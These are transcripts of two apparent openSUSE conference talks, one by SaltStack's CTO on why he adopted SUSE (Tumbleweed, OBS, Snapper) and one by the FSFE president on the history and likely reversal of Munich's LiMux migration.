In this short talk, we will present to the community the data that we have about usage of the OBS. These data show a clear trend in user behaviour and are currently used to make important decisions about our future as a Free Software project.
10.5446/54468 (DOI)
All right, now I'm going to take advantage of your hospitality and I'm going to give you a softball talk. So my name's Thomas Hatch. I'm the CTO of SaltStack. And so I'm giving a keynote tomorrow. I usually have to give a lot of very technical talks and very in-depth and visionary talks. And I never get to give a talk for fun. And so I presented or, sorry, I submitted a softball talk and probably just because you're being nice to me, you let me get up here and talk about it. Basically what I want to go through is how I introduce modern SUSE to people. Because I get some strange looks, I will admit, when people ask me what Linux distribution I'm running and I go, well, SUSE, of course. So let me kind of just talk through some of these things. And I noticed that there are other talks that use a Dr. Strangelove reference in the title. If you haven't seen the movie, Dr. Strangelove, it is absolutely hilarious. Okay, so it all started with a guy named Bo. So I get this email from Bo almost two years ago. And he says to me, SUSE is going to start using the ever-loving crap out of Salt. And my response was, so? You're SUSE, I don't care. That's honestly what I thought. And so a little later, honestly only a few weeks later, what I ran into was that we needed to reinstall the base operating systems on one of our test environments in our QA lab. And I thought, well, I have to at least look at SUSE, and I have been deeply offended by a certain other enterprise Linux distribution lately. And so I started to look at SUSE. Oh, I have a picture of Bo. If any of you don't know Bo, this is what he looks like. Okay. That's actually how I honestly describe him to people, big nose. All right. So I had to put a couple of my old SUSE biases aside. And a lot of this came from, honestly, one of my biggest old SUSE biases is that I felt like you did set up the Apache configs in a weird way. That bothered me. I've gotten over that. And so this is also, this is the main thing that I ran into when I start talking to people about SUSE. Again, I'm from the United States where things are kind of crazy over there right now. And so I'll admit SUSE is not a very popular distribution in the US. And so I usually get this kind of kickback. Ironically, even though I'm in Utah and you guys have some ties over there, for better or for worse. Okay. And I will have to admit, on the third point, I kind of like YaST now. I'm almost embarrassed to say it. It's really convenient. Okay. So the main thing that started to change my mind was how openSUSE changed their approach to releases. Again, right after Bo sent me this email, I go to the openSUSE website and go, okay, I'm going to take a look at openSUSE. And I was unaware of the whole Leap and Tumbleweed thing that was going on. And the big problem that I generally had was I'm an old Arch Linux guy. I love Arch Linux. I used to be an Arch Linux packager, et cetera, et cetera. But in the data center, I would always use CentOS. I wouldn't use anything other than CentOS or anything related to CentOS, just CentOS. And I found it frustrating that I lived in this two distribution world where I felt that I needed a completely different distribution for my laptop than I needed for my servers, whether they were in the data center or at my house. And upon learning about Leap, I got really excited about this because all of a sudden I can use a rolling distro because six-month distribution releases are silly and dumb. So hooray, I can use a rolling release.
But also, I've got a completely free operating system which is more than sufficiently stable to run the vast majority of my server needs. And so I like to compare this to using multiple programming languages. We already had a little trolling from Joe earlier if you were in this room about using multiple programming languages and how that's morally wrong. And I agree with other commenters that the solution is not more Perl. It's less Perl. I'm not a big Perl fan, or Java, sorry. But then again, I would endorse the use of Julia. If anyone's used Julia, it's brilliant. I'm not serious. But in programming, often we do have to say we're going to use something like Python for high level, get a lot of stuff done, prototyping, and then have C so that we can optimize performance where we need to. And I didn't like having the same problem inside of my operating systems. And that's a really strong selling point for people, to be able to explain how well tested Tumbleweed is. Tumbleweed is beautiful. Is Richard Brown in here? Oh, that's good. Okay. Yeah, Tumbleweed is beautiful. All right. And so I began to feel that this idea, this concept of a rolling release plus an enterprise release, in the overall way that SUSE develops software, develops the operating system and pushes it out, was far and away the optimal mechanism. And again, I felt that this six month release cycle concept is, well, I think it's a waste of a lot of people's time. Okay. And then the benefit I felt is that the enterprise software existed in the right place, that it was the right type of upsell and the right type of ramp to get somebody moving from certain environments on a rolling release, certain environments on Leap, certain environments on SLES. And I felt that was a lot smoother. Now, I don't remember who wrote this blog post, but someone from SUSE wrote a blog post about how SUSE makes decisions and then commits to them. Was that you, Joe? I really didn't mean to compliment Joe. Actually, it was a really good blog post. And this is something that really struck me because, coming from certain other distributions whose names may or may not appear on this slide, I'd become very frustrated with things kind of flopping around. Should I be using Xen, should I be using KVM? Is Btrfs still going to work in 6.9, et cetera, et cetera? And I began to really appreciate SUSE and the fact that they still put up with ReiserFS, for instance. Good job, guys. I think ReiserFS was very brilliant for its time. Obviously not quite brilliant enough. Now, all right. So the next major problem that we run into, that I feel is very important from the perspective, particularly, of deploying inside of a data center, has to do with the ability to backport software packages. So let me go back to the story. We're at SaltStack, we're determining what distribution to use underneath a new cloud deployment. And it was a pretty small cloud. And so we go, well, we'll just use OpenNebula, get this thing up and going pretty quick. Doesn't need to be complicated or fancy. And we start to install OpenNebula on SUSE. And I told one of my engineers, OK, we're going to try SUSE. And it was Tuesday, and I said, if it comes to Friday and you're frustrated and mad, we can back out. Because no one in the company had ever used SUSE at this point. This engineer is named CR, wonderful, wonderful man. He comes back to me on Thursday, and I'm fully expecting him to say, yeah, Tom, that's the SUSE garbage.
And he comes and he walks into my office and he starts talking to me about something completely different, right? And I ask him, hold on, hold on, hold on. What about the server deployment? I mean, weren't you doing this? Why are you asking me about code? And he says, oh, no, I'm done. So everything's OK? Oh, yeah, everything's fine. I'm like, so did you use SUSE? He says, yeah, yeah. And it was really interesting because at that point, again, it had been two days, he's in my office, and he says, not only have I reinstalled all the servers, but I mean, there's no more Ubuntu on my laptop. I'm running Tumbleweed. I have been converted. And the thing that did it for him was OBS. And he stayed for Snapper, but more on that later. But the thing that did it for him was OBS because he started to deploy OpenNebula, and the OpenNebula packages he could find for openSUSE were horribly out of date. And this is a showstopper a lot of the time, that it becomes very, very difficult to say, ah, nuts, you know, I really wanted to use this particular piece of software. But just because the vendor doesn't happen to be all over it, I'm going to have to go through the trouble of building my own packages. But you guys have OBS. Thank you. I don't have to build a local package build environment, the chroot stuff. Thank you. And so he's in my office, and he says, oh, I just tweaked a couple of existing RPMs, put them on OBS, and we were done. They built in a few minutes, and we were able to deploy our cloud. So thank you for OBS. Thank you for being brilliant and building that. I'm not actually going to badmouth anything else from the stage, apart from a certain other build system fills me with rage. Okay. Finally, talking a little bit more about Tumbleweed, there's an old joke in the Arch Linux community. Has anyone in here ever run Arch Linux before? Okay. Okay, I'm going to assume the number is actually higher in that most of you are just afraid to admit it in this room. So the old joke in the Arch community is something's broken, so I'll just update in a few days and that'll go away. Sure, something else will be broken, but at least this problem will go away. Arch isn't only a rolling release, and don't get me wrong, I still adore Arch. Arch isn't only a rolling release, but it's kind of like a wheel that every time it turns, it's flat in a different place. I was astonished by how thoroughly Tumbleweed gets tested, and as an Arch packager, I was very aware of the amount of effort that certain Arch packagers put into their packages. It wasn't always quite to the same level as the Tumbleweed project, to put it as kindly as I possibly can. It was rather reckless. One of the main reasons I love packaging Salt on Arch Linux is because if there's ever an upstream issue with a dependency in any plausible or conceivable way, we will find out about it in Arch very quickly. All right. So the ridiculously thorough amount of testing is something that I'm very, very grateful for. So in the old days, when you would install a Unix-style operating system, and if you install FreeBSD, who here has installed FreeBSD in the last year? Oh, very nice. I haven't installed it in the last year, so I'm running on like two years ago on this reference, but so I apologize if I'm wrong. Don't get after me. Okay. So if you install FreeBSD, you can still install it with slices or partitioning it in the classical Unix way, right?
You've got your /var subdirectories isolated, et cetera, et cetera, so that if something logs like crazy, everything's fine, right? One of the things that blew me away, just installing SUSE, was how meticulously well the Btrfs deployments are laid out, that they are very carefully thought through, that they are by default matched with the packaging and deployment and configuration options, and how they line up the right copy-on-write style, et cetera, et cetera, all of the right flags are there for all of the right Btrfs components. And I was just very impressed by that. And then the next thing that I found astonishing: this engineer CR I told you about came up to me a couple of months after we deployed these systems and asked me if I had ever used Snapper. At that point, I hadn't heard of Snapper yet. After I was introduced to Snapper, I actually sent, I think I sent Bo an email saying, so I've learned about Snapper and openQA and OBS, what other magical SUSE things am I missing? And he introduced me to quite a few more. Like osc. I love the osc command line, by the way. I don't really know that those guys would ever need to rewrite that. Sorry, for those of you who weren't here, that's what the last talk was about. Okay. I became instantly infatuated with Snapper. I mean, this thing is cool. To the extent that I started purposefully doing all sorts of crazy things to break my laptop, because all of a sudden I felt far more liberated than I had ever been before. And then thoroughly enjoyed just booting into an old snapshot. It was excellent. And all my problems went away. I can install all of those third party repositories. You know, the ones that you install but you don't tell anybody about, especially Richard Brown, because he gets all upset. He's still not here, right? Yeah. And then the ability to just boot into the past so seamlessly. And so, similarly, I was so thoroughly impressed by the fact that Snapper ran automatically, right, whenever you ran zypper or YaST, that I built Snapper support directly into Salt's configuration management runtime, so that every time you run Salt, you can snapshot back. That was the first time, and still, when we get customers who come to us and they say, well, we want full rollback, we explain to them that that's a myth unless you install SUSE. Okay. Oh, I already mentioned this because Joe brought it up in his excellent blog post. But SUSE sticks it out, and they seem to have very good judgment because they chose Salt. I'm not biased. Okay. But yeah, I did mention this before. But SUSE sticks it out. My dad, back in the late 70s, spent a few years living in Germany. And so he would tell us stories growing up about the Germans and how they are different and fantastic in very specific ways. And one of the things that he would say is that Germans will take a long time to make a decision because they want to make the right decision, because they don't want to have to back out of that decision. Now, I don't know how true that is. I'm generally under the impression that's true, interfacing with you lot. You seem to take careful, wise decisions and then stick with them. But again, this is something I've deeply grown to appreciate in the way SUSE is engineered and also in the commitments that SUSE makes to its customers and its users. I feel much safer over the long run with SUSE than I do with other operating systems because, I mean, I know that, you know, you guys are going to make mistakes. That happens. And I'm very forgiving of those mistakes.
But having that long-term confidence is something that I really like. The fact that I feel very comfortable that if SUSE says you should use software X, they're not going to back out and change that decision on me really soon. Yeah. And thank you for not using Upstart. I deeply appreciate that. Have you ever tried to automate Upstart? Okay. So, in a nutshell, this is my pitch when people say, what distro are you using? And I say, SUSE, duh. And they give me that funny look like I'm a madman. And they want me to like use some things. It blows my mind because they say, what linuxes are you using? And I say, I'm using SUSE, of course. And they give me this look like, seriously, like I'm crazy. And then I ask them, what Linux distribution are you using? And they're like, Linux From Scratch. And it's, who's the crazy guy? Or they say something like, we deploy production servers on Fedora. No. I actually worked for a company that did that. And it worked out great all the time. It was the government, the US government. They were brilliant. Actually, it was part of the US intelligence community. Ironically, the sides you don't hear about because they do their job right. Okay. So SUSE has the best release policies and release cycles. I'm not, I feel like I can back that up with more than just opinion and hyperbole. The world of open source is a rolling world. Not having a rolling release that is stabilized means that your users must always be behind the curve. And Tumbleweed solves it in a way which is infinitely more elegant than any other rolling release. Having an open source release which is stable enough to run in a server environment, I believe, is an extremely important aspect of a Linux distribution. And deploying that piece of software in such a way that enables users to get to know SUSE and get to know what an enterprise and an extremely stable SUSE environment feels like is a smart business model to help drive revenues. And that's another thing that impressed me about SUSE, is that unlike all but one other Linux distribution, you guys are profitable and growing. And I've become increasingly wary of trusting open source software which seems to be on a revenue dead end. And a lot of it is. A lot of it is. Certain pieces of software which have an extremely high amount of hype and have raised hundreds of millions of dollars make no money still. And it's terrifying and it's making it hard to raise money. It's getting easier now for us because we make money. It helps. Okay. So OBS is brilliant. And again, that's a huge part of that pitch, is to emphasize that. So when I introduce Linux operating systems to somebody, I say, look, the most important part of a Linux operating system is its packages and its package manager. That is the core of the operating system. And how well those packages and its package manager are managed is a direct reflection of the quality of the distribution and the quality of the release. And you guys are doing that right. It is not a cumbersome mess, unless, well, Joe was explaining that it's got Perl in the background, but whatever. I can overlook this. Because I endorsed Julia earlier. Okay. Let's see. openQA is amazing. Your packages are brilliant. Your release policies don't suck. You solve the two distribution problem. You guys stick to your guns. And it took me a long time to admit that pacman was no longer the world's best package manager. I think it's zypper now.
So in a nutshell, thank you for making such a fantastic Linux distribution and for making my life using Linux easier. And Richard Brown is absolutely fantastic. All right. Any questions, comments, arguments, rebuttals? If anyone honestly wants to argue with me, then that would be great, since I just told you you're the best. Yes. What feature requests do you have? As much as you love what openSUSE is doing and what the SUSE guys are doing, helping out, et cetera, what's the itch that you would love scratched? In all honesty, I'm not sure. Mostly because you take such darn good care of my software that I write. We could probably see a few more IDEs packaged. But I use KDevelop. So I know my credibility just went down. That's German, right? Okay. Any others? Yes. Yeah. First of all, thanks for this brilliant talk. I'm sorry I have to rain on your parade. I can agree with many points, and maybe it's just because I'm still on my journey and only halfway there. I have a Red Hat and Fedora background as well. So I joined SUSE last year. You are already one year ahead of me, basically. You have two years of SUSE experience, right? About one. Okay. I will admit, when I introduce SUSE to people, I do introduce it to them and say something along the lines of, SUSE is brilliant as of about two years ago. Okay. The only thing that I cannot agree on is build systems, because basically all build systems suck. There are just some build systems that suck less than others. And my question is, what sucks so hard about Koji? So in the defense of Koji, I haven't used it extensively for a few years. Mostly it was the user interface being very, very cumbersome. But also that their entire build chain and supply and package management chain is spread across a lot of different areas. But again, I haven't done a lot of work with the Red Hat build system in a few years. So that's also why I probably shouldn't have said anything negative about Koji. Setting it up is a nightmare, but I'm sure setting up OBS isn't a walk in the park either. Okay. I will happily rescind the stage.
A little over a year ago I found myself doing the Distro Dance. Trying to decide which Linux distro to use for a new datacenter deployment. I was starting to question my old solid choice, CentOS, and decided to go with SUSE. Join me as I go over my journey to SUSE, and why I am now convinced that it is the best Linux Distro out there today. Also see how I am convincing people to switch to SUSE and abandon the old ways of Linux for the chameleon.
10.5446/54471 (DOI)
We have the keynote speaker, Matthias Kirschner, and he is the president of the FSFE, the Free Software Foundation Europe. And he is going to be speaking a little bit about open source software in public administration, and briefly touch on Munich's decision to revert back to proprietary. So please welcome him to the stage. So hello everybody. I saw that there was a long queue, so I guess some people will join us a little bit later. Thank you very much for the invitation. Before I start, who of you was already involved in SUSE in the 1990s? Anyone here? Okay. So in 1999, I was facing a problem at home. I had two computers in two different rooms and they were connected with an Ethernet cable. And I somehow got the idea that it would be really nice to write an email from one of the computers to my brother in the other room. And although both of those computers had email programs installed, I was not able to accomplish that without connecting with the modem to the Internet. And then I complained about that in school. And a friend of mine, he said, well, I have something for you. And he brought me some SUSE floppies and CDs at that time and said, with that you can achieve it. It took me several hours to install that and then to see some white font on a black screen, and some more hours till I had a graphical user interface. And I had to learn lots and lots more during the next months until I was able to set up a mail server for the local network. But yeah, that got me started in free software. Later, in 2004, I joined the FSFE. So those of you who were already involved at that time, you are partly responsible that I'm here today. So thank you for that. And to all the rest of you, I thank you for helping others nowadays to join the free software movement. So yeah, I was invited to talk about the LiMux project and the status of it. I will briefly tell you a bit about the history of the project, and then I will raise a lot of questions, and I hope that you will go with more questions than you came with. And afterwards I will give you a short example of what the FSFE will do in the future in public administrations. So first of all, how did the LiMux project start? In the early 2000s, public administrations had the problem that the support for Windows NT Workstation ended, a little bit like nowadays a lot of administrations had that problem with Windows XP. So they had to upgrade their systems. And Munich thought that this was a good opportunity to evaluate whether it's the best way to just continue and upgrade to a newer version of Microsoft, or whether there are other options. So they did an analysis of that and came to the conclusion that Linux would also be an alternative to switch to. They had long debates, lots of discussions and evaluation about that. At one point, the CEO of Microsoft at that time, Steve Ballmer, made a break in his skiing holidays, came to Munich and talked with the mayor to convince him that they shouldn't do this step. Still, in 2004, the city council in Munich decided to switch to a free software operating system, their LiMux client, for their workstations. So that was the start. But then already a few weeks later, they stopped the project. Why? Because there was the fear that software patents might be a legal problem for Linux systems and maybe because of that they should not switch to a free operating system. They then had an analysis of that problem again.
And the outcome was that, with regard to software patents, using free software is not a bigger problem for them than using proprietary software. So they decided to continue. But that was the beginning of regular rumors about the end of the LiMux project. They came back again and again. One of the reasons why there were rumors about them stopping the project was often connected with costs. There were times when people argued that the project is more expensive than if they would run a Microsoft operating system. The CSU, which was at that time in the opposition, filed requests to show how much exactly they are saving with the project, or whether it wouldn't be more expensive. The IT committee at that time made an analysis and came to the conclusion that they are saving 20 million with the project. But then there was another time when there was a study by HP, and they said Munich would save 40 or 43 million euros if they would switch to Microsoft Windows for their operating systems. They didn't publish that study for quite a long time, and in the end it also turned out that Microsoft had paid for it. But things like that, the connection with the costs, was a regular thing where people said: oh, it's too expensive, the project will stop, they will switch back to Microsoft Windows. Another reason which regularly came up was the dissatisfaction of their staff, their users, with the system. There were always reports that the users are unhappy with their IT, that they are not happy with the LiMux client. Sometimes there were numbers like 20% of the people there are absolutely unhappy; sometimes it was that 40% of the people were unhappy with the system. But the public news about that was always very sketchy. It was never clear what exactly they were unhappy about. They had some internal reports, but they didn't publish them. So they were unhappy with some components, but you didn't know with which, and whether those were connected with the LiMux client or with some other components of the system. There was also never a comparison in the news of how that satisfaction rate relates to the satisfaction of users in other public administrations. I mean, if in other public administrations 50% of the people are absolutely unhappy, then 20% would be a good number. But there was never a comparison like that. So regularly it was reported that people are unhappy and because of that they are stopping the project. It was also sometimes not clear whether this unhappiness could, for example, come from the organizational changes they made at the same time. When they started the process to switch to the LiMux client for the workstations, they also started organizational changes in how their IT works. Before, people had their IT guy at the desk or in the office next to them, and after these structural changes, when they had a problem, they were just one ticket in the ticket system. That's also something which gives people the impression that it's not as good as before. But yeah, it regularly came back: people are unhappy, that's the reason why Munich will now stop and switch back to Microsoft Windows. Another reason which was also often noted was that Munich will switch back to Microsoft Office because of interoperability reasons.
So they had the problem that other public administrations were often still using Microsoft Office and were sending Microsoft Office documents to them, and they had problems processing them. Even the federal government was sending proprietary documents to the city of Munich at that time, asking them to fill them out for certain things. And that although the federal administration in Germany already had a decision at that time that every federal administration should be able to receive, to edit and to send back ODF documents. But it's very difficult, of course — and this is also connected with the example before about the unhappiness of the users — to tell your users that it's the others' fault when everybody around them tells them it's your fault. So it's a very tough place to be. But yeah, that was something which regularly pushed the rumors that they have to switch back and the project will fail. And then there was another reason, which was nothing at all. I had the impression that when there weren't any news about LiMux for some time, people said: oh, I heard that they are now switching back to Microsoft Windows. From my experience, that also happened. Still, despite all those challenges, they were able to finish their project in 2013. They were able to migrate 15,000 workstations to their LiMux client. And beside that, they were also able to migrate and unify a lot of office templates. They also published the software they use to take care of this template management, the WollMux software. So yeah, they accomplished that. And of course such a migration is a very tough process, with all the organizational changes they were also doing, and then switching an IT system which before that was depending a lot on the software of a few vendors. In this process, they always had the support of their mayor and of the political leadership — Christian Ude, the mayor at the time, who had started the project in 2004. So whenever there were complaints from other departments, at least they knew that the leadership would somehow support what they were doing, and whatever they were facing, they would get some moral support. But that changed in 2014. There were new elections, and the previous mayor didn't run again. After the election, the SPD, which was also the party of the previous mayor, and the CSU formed a coalition and are now governing together. The new mayor is Dieter Reiter, who is also from the SPD, but who already before that was not a big fan of the LiMux project. He was quoted in some newspapers as a Microsoft fan, and he was also very proud to say that he had an important role in Microsoft moving their German headquarters to Munich — he was very involved in that, he claimed. So from that time on, it seemed that LiMux was somehow the scapegoat for everything. That started with things like the new deputy mayor, from the CSU, buying an iPhone and wanting to connect it to the mail servers, which were not supposed to be connected with iPhones at that time. Whose fault is that? The LiMux client, of course. Then there was a mail server outage. What did the media report? The media reported that Dieter Reiter, the mayor of Munich, said that it's Linux's fault, and that if only their systems were better... So he was claiming that this is the fault of Linux, although it later turned out that Linux had nothing to do with this problem.
So yeah, regularly you could read in the press that people were unhappy and that they now want to switch back. They were never shy to say: yeah, we are switching back to Microsoft Windows now. And when you were travelling at that time, what people all around the world heard was: oh, Munich switched back to Microsoft Windows, right? So even now when you meet people, they still think: well, they already switched like two years ago, didn't they? So in the overall picture of what people around the world think Munich is doing, they have already migrated back to Microsoft Windows years ago. What happened next was that the city government paid for a study to evaluate their IT, and already when the study was commissioned people said: oh, it will be quite clear what the outcome will be, because the study was given to Accenture, which has been Microsoft Gold partner of the year for, I think, eight years in a row. So they thought: okay, it will be quite unlikely that they will say anything positive about free software. But it didn't turn out like that. The outcome of the study was mainly that they highlighted organizational problems. They said: yes, there are also technical challenges, but the biggest problem are the organizational difficulties you're facing. For example, at that time one of the city council members said that because no central entity can decide when to apply an update — every department can decide that on its own — they had phases where they had more than 10 to 15 different operating system versions running. And there were OpenOffice versions from several years ago, with bugs people were complaining about which had already been fixed for years. So their main recommendation was: you have to fix those organizational problems and fix your structure. And then it was a little bit silent for some time again. And then there was a surprise motion in the city council, earlier this year. There was something on the agenda about those organizational changes — they didn't take the recommendations exactly as Accenture gave them, they came up with another organizational structure which they wanted to implement — but that was mainly what was on the agenda. And then, a few days before the city council meeting, there was a slight update. It was under 6B new. And there they added a few words to say that they want to prepare a concept to move to a unified Microsoft Windows client. And everybody was like: what? Are there supporting documents for that? What costs will be associated with that change? What plan do you have? But there was nothing. It was just those words. So we thought that if they want to take this decision, they should at least take it knowing the facts. They should be aware of what they are deciding about. So we gathered lots of questions, like: how much will that cost? What dependencies do you have at the moment which might not run on a Microsoft Windows client? What will happen with your IT staff, which is now trained to run the free software operating system and all the software you are running at the moment? What will they do? Can they just become Microsoft Windows admins, or what will happen there? And together with other organizations, we gathered lots of questions.
And then we contacted all city council members and asked them, before they take this decision, to answer those questions for themselves, or to ask the government what the answers to those questions are. And we also raised those questions with the press and with our supporters, and asked them to ask their politicians about it. That resulted in a lot of questions to the politicians there. At the final meeting, several people from the city council said they had never had so many requests from the public, never had so many people interested in what they are doing there. They got so many questions, and also from the press — it was not just the IT press which was there; there were also people there with a TV team, like Investigate Europe, a team of investigative journalists. At that time they were also working on a story about the dependency of public administrations in Europe on Microsoft. When they heard about this, they went there with a camera team, recorded everything and made interviews. So there was a lot of attention. And due to that attention, I believe, the mayor had to back down a little bit. He said this was never supposed to be a decision to do that, it was just about examining it — that's all recorded and on video. He said: well, it's just about examining, it's not a final plan yet. And during the city council meeting there was feedback from the opposition; there were people who were very outraged that this was just put on the agenda shortly before, in a sub-note, by adding a few words. So in the end they agreed to amend this decision. They added that this new concept should also make clear which software will not run afterwards, so that everybody in the city administration knows what software they will not be able to use anymore. They will have to provide at least a rough estimation of the costs, which is quite good, because before that you heard lots of different numbers — sometimes 20 million, 40 million, 80 million or so — and I think it would be beneficial if it were a little clearer how much money they would like to spend there. And it was added that the final decision about this move will be taken in the city council again. So this was not the decision; it will be decided later in the city council. So that was the meeting earlier this year. But in the meeting you could already hear that a lot of them were already convinced that they want to go back to Microsoft Windows — especially from the CSU, and also some people from the SPD. In their comments they already said: I am very happy that we are now moving back to Microsoft Windows — and then they continued to argue. And even now, after those amendments, it's not clear to the people in the city council what exactly this is about. Some people think they decided to move back to Microsoft Windows; others know it was just about a concept. So there is quite some chaos there. But their plan is now to develop a concept so that they can switch all their workstations back to one unified Microsoft Windows client by 2020. And beside that, also do those organizational changes they decided on — that should also happen by that time. So that's the plan at the moment.
And we also hear that they are now already internally preparing some things, like changing budgets and already shutting down some services, to move in this direction — although there was no official decision yet and the city council did not take any final decision. But still, I think it's fair to say that this is the end of a lighthouse. It's not the shining example of free software in the public administration anymore, if it was that before. And even so, there are people there who do good work and who try hard to migrate to free software and keep that running. But if your boss constantly discourages and sabotages your work instead of supporting you, you cannot do something like that. So the question is: is it all their fault? Is it their fault that there was no political support, that a lot of mistakes were made in how to handle it? Is it mainly on Munich? I think that would be a bit too easy. And I think that if we take this approach, we will lose the opportunity to use this as a moment to evaluate whether maybe we also made some mistakes — whether all of us here also did things which made it more likely for this migration, or for other migrations, not to work out. So I would like to raise a few questions, and I'm very much looking forward to your answers afterwards in the discussion. First question: do we suck at the desktop? I mean, free software is very dominant in a lot of places. We have supercomputers running free software, all kinds of servers, a lot of embedded devices, cars are now running free software, mobile phones — everywhere you have free software operating systems. But in the desktop area, even a lot of people in our community are using proprietary operating systems. So why? I think that's something we should think about, and see if we can come up with solutions for fixing it. There is also the question: is it maybe not about the desktop at all? Maybe our desktops would be fine, but the problem is the huge dependency in the public administration on Microsoft Office and Microsoft Exchange — it doesn't matter how good your desktop below that is, even if it's better, because those systems don't run there, so you're not able to switch anyone. That could be, but then still: why are so many people in our own community not running our operating systems on the desktop? The other question is: did we concentrate too much, in our communication with friends and people around us, on the cost savings? Do we concentrate too much on highlighting that free software is cheaper in the long run, that it's mainly about costs? Because if we constantly do that, also with our friends and the people around us, people will often associate free software with being the cheaper solution — if I don't have a big enough budget, I still have the possibility to move to free software. With this approach, people will not allocate enough budget to move and migrate to free software. A migration will always cost a lot, and why should free software be cheaper than proprietary software in the short term? In the long run, maybe yes, but still — this association with "it's cheaper" — is that something we can fix by educating the people around us that you have to pay for free software too? When we provide something to them, we can also ask them to pay for it.
And the question is whether we sometimes fail to encourage people in our community, or companies, to charge for free software. Some of us even attack people because they put a price tag on free software. Can we change the perception in another direction if we more regularly charge for it, and support the people who are charging for free software, whether they are individuals or companies? And then, maybe the most provocative one: do we sometimes harm ourselves by volunteering? That comes from situations with those migrations where you have staffers or external volunteers who want so much for public administrations or schools or other organizations to switch to free software that they say: well, I will invest a lot of my free time and energy into that. So they start doing it, although there is no budget allocated to it. And their boss says: yeah, okay, you have been telling me about those advantages for several years now — go ahead. And then you invest a lot of time and energy into it. You might be able to cope with a lot of the challenges, but after a few years you might face problems, and if you don't have a budget to get help from external people, you will most likely fail. What usually happens then is that the bosses don't think: oh, the problem was that we didn't allocate budget so that we could get external professional help for our migration. The conclusion is mostly: oh, so free software doesn't work — let's allocate some budget and do it with a proprietary company, the right way. So the question is: do we, by investing too much of our time and energy into switching people to free software without the appropriate budget, harm free software in the long run? Is it not sustainable enough if we do it that way? Might we even have to tell people, when they want to move to free software but don't have a budget: well, don't do it. Stay where you are. Concentrate your smaller budget on something else. So yeah. Then another question is: did we focus too much on the operating system and too little on the applications? And that's actually two questions. On the one side, I think it's understandable: a lot of us use our operating systems, we are very happy with them, and we would like others to also benefit from them. And we are not that much interested in all the other applications which public administrations are running — they are very complicated and often boring. But is focusing on the operating system, and switching the operating system, the right thing for the public administrations? Or wouldn't they benefit more if we concentrated on making sure that, in the first run, all the applications will be free software? On the other side, maybe some people inside public administrations also focused too much on the operating system. So maybe, instead of focusing more on the applications, they first started to build their own distributions for the migration. Might that be a mistake? Might it be better to use standard free software distributions and focus more on the applications, where more people in the organization might see the differences? And the other question is: is it possible that we concentrated too much on a few stars? And is that a problem in the long run, when you put too much of your argument in one place?
So my observation for a long time was: when people asked whether free software works in public administration in general, people said, yes — Munich. That was the default answer of many people. The problem is that, as we saw, in one city it's not just a technical component which is responsible for the success or the failure of something. But if we always just mention a few examples and put projects in those star positions, that might be very harmful for us in the long run. And on the other hand, do we actually still need it? We are now in a situation where so many companies are using free software out there. And also public administrations — when you go away from the desktop part, they are using free software in so many places, free software applications to do their jobs. So wouldn't it be better to concentrate on showing those examples of what you can do with free software in the public administration, and not focus so much on the desktop, or on a few examples where they achieved that? So yeah, now I have asked a lot of questions and I'm very much looking forward to discussing them with you later. And I also want to give you a short outlook on what we at the FSFE want to do in the next months and years — probably years, because it will not be a short-term project. We are at the moment in the process of starting a campaign. It's called Public Money, Public Code. Our belief is that whenever software is produced with public money for public administrations, it should be published under a free software license — that should be the baseline. And we are at the moment starting with that, gathering a lot of information. We believe that the default in public administrations should be that they reuse software when they develop something, that they share new applications, and all of that independent of the operating system. So it's not just about software which runs on GNU/Linux. It's about software which runs on Windows, on macOS, on Chrome OS, or whatever they are using. We would like that to be free software. We would like them to be able to share software with each other. It's not about cost savings. We believe that their IT will be better, that they will be in control of their IT when using free software, and we think that they will thereby also give a better service to their citizens. So yeah, this is a picture from this year's I Love Free Software Day in February, where some volunteers used projectors to project this message onto government buildings, because we think that for this topic we also need good pictures for the press. That picture was also used by Investigate Europe in their reporting about the Microsoft dependency. The other thing we are doing is gathering quotes from people who support this — in that case the European Commission — but we would like to have more support from people, from companies, from politicians, celebrities: whoever thinks it's better to share and reuse government software instead of procuring the same thing again and again. We are also looking for good examples — not desktop users, but applications. For example, many people have heard about Munich and free software, but who of you knows FixMyStreet? FixMyStreet was developed in the UK. It's a software where you can report problems — when the road is damaged, for instance — and help your public administration to fix them. It is meanwhile used in eight countries around the world. They are using the same software.
It's free software. There are apps you can use to report problems. Those are the examples we would like to highlight — how public administrations can benefit from sharing. To stay with this example: the city of Berlin, just a few months ago, developed their own software doing exactly the same thing. It cost one million euros. And if you are interested in helping with this, we would be very happy if you join us. One of the most important things we are doing at the moment is gathering a lot of data. How is software procured at the moment? What kind of software do they procure? How often do public administrations procure the same software again? For that we are starting a lot of freedom of information requests to public administrations. At the URL down there, there are examples for different countries and different cities, so you can use them and submit them to your city. In a lot of countries there are also platforms which make it very easy to file those requests. We document the ones we know about — if you know about more, add them to the wiki. It will not take much of your time to make those submissions, but in total, when all of us do it, we will have a very good database for the future campaign. So before I go to the Q&A with you, I would like to end with a quote from my first teacher, actually. Well, he wrote it down for me — he didn't invent it, just to clarify that: many small people in many small places, doing many small things, will change the face of the world. So every action counts. Whatever you do — if you are developing, packaging, distributing free software, if you are documenting it or translating it, or if you are helping new users or developers to get active in free software — all of that might not seem big at the time you do it. But all the different activities by all the different people together in so many places, that will change the world. So thank you for helping us to change the world, and I'm looking forward to the Q&A. Thank you. Thank you. Thanks a lot. I think that was a great presentation, and I think we shouldn't see it all too negatively. I mean, if they really move back to Windows and the whole administration gets fucked up by a crypto trojan, it's much easier to ask the friends from the NSA to get it back up. So I think it's not that bad. But jokes aside, two things I would like to address. First: was there ever an evaluation of whether the new operating system by Microsoft, Windows 10, complies with the German Betriebsverfassungsgesetz, as it's called? Because the information it transfers to a service abroad alone may already violate this law. The second thing: you asked whether we are focusing too much on operating systems instead of applications. I think applications are not what a company wants — they want solutions. At the end of the day, you don't want to buy a drill, you want a hole in the wall. So I think we as a community should focus more on solutions that we could provide, not so much on applications or operating systems. That's the idea. Thanks. So yeah, thank you very much. For the first question: I'm not aware that they did an evaluation about that. From what I saw, there was no real evaluation about this move at all. It felt a little bit like: we want to switch to Microsoft Windows because we want to switch to Microsoft Windows.
